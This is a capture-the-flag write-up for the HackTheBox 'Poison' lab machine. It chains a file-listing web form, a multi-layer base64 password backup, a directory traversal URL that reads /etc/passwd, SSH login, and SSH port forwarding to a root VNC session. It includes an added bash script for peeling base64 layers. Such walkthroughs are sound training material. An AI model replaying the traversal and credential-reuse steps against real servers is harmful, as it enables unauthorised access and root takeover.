HackTheBox Poison Writeup

1/31/2024

Explore the step-by-step process of hacking into the Poison machine on HackTheBox, a renowned platform for honing cybersecurity skills through hands-on challenges. This detailed writeup provides insights into the techniques, tools, and methodologies used to root the box.

Overview

I started this box because it was tagged as Medium difficulty and it was running FreeBSD. But after finishing the machine, I think it should have been marked as an easy machine.

The box requires some knowledge of VNC and X Window Authorization. However, it is relatively simple otherwise.

Enumeration

The IP of the machine is 10.10.10.84.

Nmap

nmap -sC -sV -oA nmap/Poison 10.10.10.84

nmap scan results

We see that port 22 (SSH) and port 80 (HTTP) are open.

Webserver (Port 80)

Webpage

Entering listfiles.php in the Scriptname section of the page returns:

Array ( [0] => . [1] => .. [2] => browse.php [3] => index.php [4] => info.php [5] => ini.php [6] => listfiles.php [7] => phpinfo.php [8] => pwdbackup.txt )

Let's try to access this file by putting its filename in the Scriptname section.

pwdbackup.txt

This is base64, and it looks like it has been encoded 13 times. Save the contents to passwd.txt and use a quick bash script to decode it: we run a for loop 13 times, decoding the file in place on each pass.

#!/bin/bash
file="passwd.txt"
temp_file=$(mktemp)
# There are spaces in the file that shouldn't be there; strip them first.
sed 's/ //g' "$file" > "$temp_file"
mv "$temp_file" "$file"
# Peel off the 13 base64 layers, one per iteration, decoding in place.
for (( i=1; i<=13; i++ ))
do
    base64 -d "$file" > "$file.tmp" && mv "$file.tmp" "$file"
done
cat "$file"

We get the password Charix!2#4%6&8(0. We don't know what it is used for yet, and we don't have any username to try over SSH.
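A more general version of the decode loop, added here as an example rather than the writeup's own script: it strips the stray whitespace, then keeps peeling layers until the output is no longer valid, printable base64, so the number of layers (13 here) does not have to be known up front. It assumes GNU coreutils base64 and builds its own constructed sample input from the recovered password.

```bash
#!/bin/bash
# Added example (not the writeup's script): peel an unknown number of base64
# layers instead of hard-coding 13. Assumes GNU coreutils base64 (-w0, -d).

# Constructed sample: the recovered password wrapped in 13 base64 layers,
# then broken into lines with a trailing space, like the real pwdbackup.txt.
make_sample() {
  local data='Charix!2#4%6&8(0' i
  for ((i = 1; i <= 13; i++)); do
    data=$(printf '%s' "$data" | base64 -w0)
  done
  printf '%s' "$data" | fold -w 64 | sed 's/$/ /'
}

# peel_base64 BLOB [MAX_DEPTH]: repeatedly base64-decode BLOB until the
# output is no longer valid printable base64 (i.e. we reached the plaintext)
# or MAX_DEPTH layers have been removed. Prints the final plaintext and
# leaves the number of layers removed in the global PEELED.
peel_base64() {
  local data="$1" max="${2:-32}" next
  PEELED=0
  # Drop whitespace that would otherwise make the decoder choke.
  data=$(printf '%s' "$data" | tr -d ' \t\r\n')
  while [ "$PEELED" -lt "$max" ]; do
    # base64 -d exits non-zero on non-alphabet input: that is the plaintext.
    next=$(printf '%s' "$data" | base64 -d 2>/dev/null) || break
    # A decoded layer that is not printable text is payload bytes, not
    # another base64 layer; stop before accepting it.
    [ "$next" = "$(printf '%s' "$next" | tr -cd '[:print:]')" ] || break
    [ -n "$next" ] || break
    data=$next
    PEELED=$((PEELED + 1))
  done
  printf '%s\n' "$data"
}

peel_base64 "$(make_sample)"
echo "layers removed: $PEELED"
```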

So let's try a directory traversal attack through browse.php to see if we can read the /etc/passwd file.

http://10.10.10.84/browse.php?file=../../../../../../../../../../../../etc/passwd

/etc/passwd

The username is charix.

Initial Foothold

ssh (port 22)

Now that we have the credentials, we can try to log in over SSH.

ssh connection

Privilege Escalation

We get secret.zip, which is an encrypted file. Unfortunately, I cannot type any password in the ssh connection, so I will move the file out using scp.

scp charix@10.10.10.84:/home/charix/secret.zip secret.zip

Decrypting it gives us a binary file named secret. Right now we do not have a use for this file, so back to enumeration.

charix@Poison:~ % ps -auwwx
USER     PID %CPU %MEM   VSZ  RSS TT  STAT STARTED    TIME COMMAND
. . .
root     529  0.0  0.9 23620 8868 v0- I    00:48   0:00.03 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1
. . .
charix   922  0.0  0.3 21208 2652  1  R+   02:59   0:00.00 ps -auwwx

We see an Xvnc session running with root privileges on port 5901. We have the secret binary, and that could be used for cookie-based authentication.

To try it we need access to the VNC port, and since Xvnc is started with -localhost it only listens on the box itself, so we forward the port through SSH (there is no point connecting to VNC from inside the ssh session). This is a worthy shot; try the lowest-hanging fruit first.

ssh -L5901:127.0.0.1:5901 charix@10.10.10.84

Now we can access the port on localhost:5901.

vncviewer 127.0.0.1:5901 -passwd secret

vncviewer

Rooted